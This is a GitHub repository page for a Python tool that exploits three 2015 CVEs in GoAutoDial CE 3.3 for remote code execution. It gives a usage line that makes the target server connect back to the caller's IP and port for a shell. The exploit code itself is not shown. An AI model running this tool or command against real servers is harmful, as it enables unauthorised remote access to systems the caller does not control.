Skip to content

CodeXTF2/goautodial-rce-exploit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 

Repository files navigation

goautodial-rce-exploit

Pops a shell on a goautodial server

This exploits CVEs CVE-2015-2843, CVE-2015-2844 and CVE-2015-2845 to pop a shell on a server running GoAutoDial CE 3.3-1406088000.
Refer to https://www.exploit-db.com/exploits/36807 for steps for manual exploitation.

usage:
python3 exploit.py targetip myip myport
example:
python3 exploit.py 192.168.1.11 192.168.1.10 4444

About

Pops a shell on a goautodial server

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages